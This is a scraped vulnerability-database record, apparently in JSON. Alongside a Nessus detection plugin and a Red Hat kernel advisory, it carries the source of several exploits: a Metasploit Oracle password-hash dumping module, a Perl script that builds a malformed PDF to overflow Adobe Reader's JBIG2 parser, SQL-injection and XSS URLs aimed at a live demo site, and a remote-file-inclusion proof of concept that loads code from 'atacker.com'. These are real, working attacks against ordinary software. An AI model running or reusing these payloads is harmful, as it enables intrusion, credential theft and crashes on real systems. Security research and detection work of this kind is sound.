Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux\nkernel's FAT file system implementation. A local user able to mount a\nFAT file system with the 'utf8=1' option could use this flaw to crash\nthe system or, potentially, to escalate their privileges.\n(CVE-2013-1773, Important)\n\n* It was found that the RHSA-2012:0333 update did not correctly fix\nthe CVE-2011-4131 issue. A malicious Network File System version 4\n(NFSv4) server could return a crafted reply to a GETACL request,\ncausing a denial of service on the client. (CVE-2012-2375, Moderate)\n\n* A memory disclosure flaw was found in the way the load_script()\nfunction in the binfmt_script binary format handler handled excessive\nrecursions. A local, unprivileged user could use this flaw to leak\nkernel stack memory to user-space by executing specially crafted\nscripts. (CVE-2012-4530, Low)\n\n* A flaw was found in the way file permission checks for the\n'/dev/kmsg' file were performed in restricted root environments (for\nexample, when using a capability-based security model). A local user\nable to write to this file could cause a denial of service.\n(CVE-2013-1772, Low)\n\nThe CVE-2012-2375 issue was discovered by Jian Li of Red Hat.\n\nThis update also fixes multiple bugs. 
Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which upgrade the\nkernel-rt kernel to version kernel-rt-3.6.11-rt28, correct these\nissues, and fix the bugs noted in the Red Hat Enterprise MRG 2\nTechnical Notes. The system must be rebooted for this update to take\neffect.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2012-0333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0333\"\n );\n # https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_MRG/2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9345c1b9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-4530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1772\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mrg-rt-release\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-2375\", \"CVE-2012-4530\", \"CVE-2013-1772\", \"CVE-2013-1773\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0566\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0566\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mrg-rt-release-3.6.11-rt28.20.el6rt\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n 
extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux kernel's\nFAT file system implementation. A local user able to mount a FAT file\nsystem with the \"utf8=1\" option could use this flaw to crash the system or,\npotentially, to escalate their privileges. (CVE-2013-1773, Important)\n\n* It was found that the RHSA-2012:0333 update did not correctly fix the\nCVE-2011-4131 issue. A malicious Network File System version 4 (NFSv4)\nserver could return a crafted reply to a GETACL request, causing a denial\nof service on the client. (CVE-2012-2375, Moderate)\n\n* A memory disclosure flaw was found in the way the load_script() function\nin the binfmt_script binary format handler handled excessive recursions. A\nlocal, unprivileged user could use this flaw to leak kernel stack memory to\nuser-space by executing specially-crafted scripts. (CVE-2012-4530, Low)\n\n* A flaw was found in the way file permission checks for the \"/dev/kmsg\"\nfile were performed in restricted root environments (for example, when\nusing a capability-based security model). A local user able to write to\nthis file could cause a denial of service. (CVE-2013-1772, Low)\n\nThe CVE-2012-2375 issue was discovered by Jian Li of Red Hat.\n\nThis update also fixes multiple bugs. 
Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which upgrade the kernel-rt\nkernel to version kernel-rt-3.6.11-rt28, correct these issues, and fix the\nbugs noted in the Red Hat Enterprise MRG 2 Technical Notes. The system must\nbe rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:29", "published": "2013-03-06T05:00:00", "id": "RHSA-2013:0566", "href": "https://access.redhat.com/errata/RHSA-2013:0566", "type": "redhat", "title": "(RHSA-2013:0566) Important: kernel-rt security and bug fix update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-09-17T08:03:46", "bulletinFamily": "exploit", "description": "This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast. 
This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\n", "modified": "2019-03-28T14:06:56", "published": "2011-10-18T00:54:05", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_HASHDUMP", "href": "", "type": "metasploit", "title": "Oracle Password Hashdump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Oracle Password Hashdump',\n 'Description' => %Q{\n This module dumps the usernames and password hashes\n from Oracle given the proper Credentials and SID.\n These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.\n This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n return if not check_dependencies\n\n # Checks for Version of Oracle. Behavior varies with oracle version.\n # 12c uses SHA-512 (explained in more detail in report_hashes() below)\n # 11g uses SHA-1 while 8i-10g use DES\n query = 'select * from v$version'\n ver = prepare_exec(query)\n\n if ver.nil?\n print_error(\"An error has occurred while querying for the Oracle version. 
Please check your OPTIONS\")\n return\n end\n\n unless ver.empty?\n case\n when ver[0].include?('8i')\n ver='8i'\n when ver[0].include?('9i')\n ver='9i'\n when ver[0].include?('10g')\n ver='10g'\n when ver[0].include?('11g')\n ver='11g'\n when ver[0].include?('12c')\n ver='12c'\n when ver[0].include?('18c')\n print_error(\"Version 18c is not currently supported\")\n return\n else\n print_error(\"Error: Oracle DB version not supported.\\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\\nDumping unsupported version info:\\n#{ver[0]}\")\n return\n end\n vprint_status(\"Server is running version #{ver}\")\n end\n\n this_service = report_service(\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :name => 'oracle',\n :proto => 'tcp'\n )\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Oracle Server Hashes',\n 'Indent' => 1,\n 'Columns' => ['Username', 'Hash']\n )\n\n begin\n case ver\n when '8i', '9i', '10g' # Get the usernames and hashes for 8i-10g\n query='SELECT name, password FROM sys.user$ where password is not null and name<> \\'ANONYMOUS\\''\n results= prepare_exec(query)\n unless results.empty?\n results.each do |result|\n row= result.split(/,/)\n tbl << row\n end\n end\n when '11g', '12c' # Get the usernames and hashes for 11g or 12c\n query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \\'ANONYMOUS\\''\n results= prepare_exec(query)\n #print_status(\"Results: #{results.inspect}\")\n unless results.empty?\n results.each do |result|\n row= result.split(/,/)\n next unless row.length == 2\n tbl << row\n end\n end\n end\n rescue => e\n print_error(\"An error occurred. 
The supplied credentials may not have proper privileges\")\n return\n end\n print_status(\"Hash table :\\n #{tbl}\")\n report_hashes(tbl, ver, ip, this_service)\n end\n\n # Save each row in the hash table as credentials (shown by \"creds\" command)\n # This is done slightly differently, depending on the version\n def report_hashes(table, ver, ip, service)\n\n # Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)\n # to a format that John The Ripper can handle. This format is stored here.\n case ver\n when '8i', '10g'\n jtr_format = \"des,oracle\"\n when '11g'\n jtr_format = \"raw-sha1,oracle11\"\n when '12c'\n jtr_format = \"oracle12c\"\n end\n\n service_data = {\n address: Rex::Socket.getaddress(ip),\n port: service[:port],\n protocol: service[:proto],\n service_name: service[:name],\n workspace_id: myworkspace_id\n }\n\n # For each row in the hash table, save its corresponding credential data and JTR format\n table.rows.each do |row|\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n username: row[0],\n private_data: row[1],\n private_type: :nonreplayable_hash,\n jtr_format: jtr_format\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n print_good(\"Hash Table has been saved\")\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_hashdump.rb"}], "zdt": [{"lastseen": "2018-04-02T03:22:41", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-02-23T00:00:00", "published": "2009-02-23T00:00:00", "id": "1337DAY-ID-6759", "href": "https://0day.today/exploit/description/6759", "type": "zdt", "title": "Adobe Acrobat Reader 
JBIG2 Local Buffer Overflow PoC #2 0day", "sourceData": "============================================================\r\nAdobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day\r\n============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n# k`sOSe 02/22/2009\r\n\r\n# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html\r\n\r\nmy $size = \"\\x40\\x00\";\r\nmy $factor = \"ABCD\";\r\nmy $data = \"A\" x 8314;\r\n\r\n\r\nprint pdf();\r\n\r\nsub pdf() \r\n{\r\n\r\n\"%PDF-1.5\\n\" .\r\n\"%\\xec\\xf5\\xf2\\xe1\\xe4\\xef\\xe3\\xf5\\xed\\xe5\\xee\\xf4\\n\" .\r\n\"3 0 \\n\" .\r\n\"xref\\n\" .\r\n\"3 16\\n\" .\r\n\"0000000023 00000 n \\n\" .\r\n\"0000000584 00000 n \\n\" .\r\n\"0000000865 00000 n \\n\" .\r\n\"0000001035 00000 n \\n\" .\r\n\"0000001158 00000 n \\n\" .\r\n\"0000001287 00000 n \\n\" . \r\n\"0000001338 00000 n \\n\" .\r\n\"0000001384 00000 n \\n\" .\r\n\"0000002861 00000 n \\n\" .\r\n\"0000003637 00000 n \\n\" .\r\n\"0000005126 00000 n \\n\" .\r\n\"0000005173 00000 n \\n\" .\r\n\"0000005317 00000 n \\n\" .\r\n\"0000005370 00000 n \\n\" .\r\n\"0000005504 00000 n \\n\" .\r\n\"0000000714 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\\n\" .\r\n\"startxref\\n\" .\r\n\"0\\n\" .\r\n\"%%EOF\\n\" .\r\n\" \\n\" .\r\n\"4 0 obj\\n\" .\r\n\"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\\n\" .\r\n\"endobj\\n\" .\r\n\" \\n\" .\r\n\"5 0 obj\\n\" .\r\n\"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\\n\" .\r\n\"endobj\\n\" .\r\n\"6 0 obj\\n\" .\r\n\"<</Length 56/Filter/FlateDecode>>\\n\" .\r\n\"stream\\n\" 
.\r\n\"x\\x9c\\xe3*T031P\\x00A\\x13\\x0b\\x08\\x9d\\x9c\\xab\\xa0\\xef\\x99k``\\xa8\\xe0\\x92\\xaf\\x10\\xc8\\x85[\\x81\\x11!\\x05\\xc6\\x84\\x14\\x98\\xc0\\x14\\xc0\\$\\@\\xb4\\x05\\xb2\\n\" .\r\n\"S\\xb0\\n\" .\r\n\"\\x00J\\x15#,\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"12 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\x00\\x00\\x01\" . $size . $factor . \"\\x13\" . $data . \"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\"13 0 obj\\n\" .\r\n\"<</Type/OCG/Name(Text Color)>>\\n\" .\r\n\"endobj\\n\" .\r\n\"14 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"1 0 obj\\n\" .\r\n\"<</Type/Pages/Kids[5 0 R]/Count 1>>\\n\" .\r\n\"endobj\\n\" .\r\n\"xref\\n\" . \r\n\"0 3\\n\" . 
\r\n\"0000000000 65535 f \\n\" .\r\n\"0000009988 00000 n \\n\" .\r\n\"0000010039 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\\n\" .\r\n\"startxref\\n\" .\r\n\"104\\n\" .\r\n\"%%EOF\\n\";\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6759"}, {"lastseen": "2018-01-05T11:02:58", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-06T00:00:00", "published": "2008-11-06T00:00:00", "id": "1337DAY-ID-4102", "href": "https://0day.today/exploit/description/4102", "type": "zdt", "title": "Prozilla Software Directory (XSS/SQL) Multiple Vulnerabilities", "sourceData": "==============================================================\r\nProzilla Software Directory (XSS/SQL) Multiple Vulnerabilities\r\n==============================================================\r\n\r\n\r\n==============================================================================\r\n\tSoftware Directory v1.0 (SQL/XSS) Remote SQL Vulnerability\r\n==============================================================================\r\n\r\n\t[\u00c2\u00bb] Script: [ Software Directory v1.0 ]\r\n\t[\u00c2\u00bb] Language: [ PHP ]\r\n\t[\u00c2\u00bb] Type: [ Commercial ]\r\n\t[\u00c2\u00bb] Report-Date: [ 06.11.2008 ]\r\n\t[\u00c2\u00bb] Founder: [ G4N0K ]\r\n\r\n\r\n===[ XPL ]===\r\n\r\n\t[ SQLi ]\r\n\t[\u00c2\u00bb] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--\r\n\r\n\r\n\t[ XSS ]\r\n\t[\u00c2\u00bb] http://localhost/[path]/signinform.php?msg=\"><script>alert(document.cookie)</script>\r\n\r\n\r\n\r\n\r\n===[ LIVE ]===\r\n\t\r\n\t[ SQLi ]\r\n\t[\u00c2\u00bb] 
http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--\r\n\r\n\t[ XSS ]\r\n\t[\u00c2\u00bb] http://demo.turnkeyforms.com/software-directory/signinform.php?msg=\"><script>alert(document.cookie)</script>\r\n\r\n\t\r\n===[ Greetz ]===\r\n\r\n\t[\u00c2\u00bb] ALLAH\r\n\t[\u00c2\u00bb] Tornado2800 \r\n\t[\u00c2\u00bb] Hussain-X \r\n\r\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\r\n\t//ALLAH,forgimme...\r\n\r\n===============================================================================\r\nexit(); //EoX\r\n===============================================================================\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4102"}, {"lastseen": "2018-04-09T16:54:17", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-03-13T00:00:00", "published": "2007-03-13T00:00:00", "id": "1337DAY-ID-1584", "href": "https://0day.today/exploit/description/1584", "type": "zdt", "title": "WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability", "sourceData": "====================================================================\r\nWebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n____________________ ___ ___ ________\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_74$2007\r\n\r\n-------------------------------------------------------------------------------------\r\n[ECHO_ADV_74$2007] WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability\r\n-------------------------------------- 
----------------------------------------------\r\n\r\nAuthor\t\t: Dedi Dwianto a.k.a the_day\r\nDate Found\t: March, 13th 2007\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication\t: WebCreator\r\nversion\t\t: <= 0.2.6-rc3\r\nURL\t\t: http://webcreator.innoxia.cz/\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~\r\n\r\n- Invalid include_once function at mods/content/load.inc.php\r\n-----------------------mods/content/load.inc.php------------\r\n\r\n<?\r\n include_once($moddir . '/functions.lib.php');\r\n?>\r\n\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"$moddir\" parameter in load.inc.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nalso affected files :\r\n\r\nconfig/load.inc.php\r\nhttp/load.inc.php\r\n\r\nand More ....\r\n\r\n\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~\r\n\r\nhttp://localhost/mods/config/load.inc.php?moddir=http://atacker.com/inject.txt?\r\nhttp://localhost/mods/http/load.inc.php?moddir=http://atacker.com/inject.txt?\r\n\r\n\r\nSolution:\r\n~~~~~\r\n\r\n- Sanitize variable $moddir affected files.\r\n- Turn off register_globals\r\n\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~\r\n~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous\r\n~ Jessy Nice Girl\r\n~ az001,bomm_3x,matdhule,angelia\r\n\r\n \r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1584"}], 
"securityvulns": [{"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Integer overflow in signed/unsigned conversion during .doc file parsing.", "modified": "2005-04-13T00:00:00", "published": "2005-04-13T00:00:00", "id": "SECURITYVULNS:VULN:4074", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4074", "title": "Microsoft Word integer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}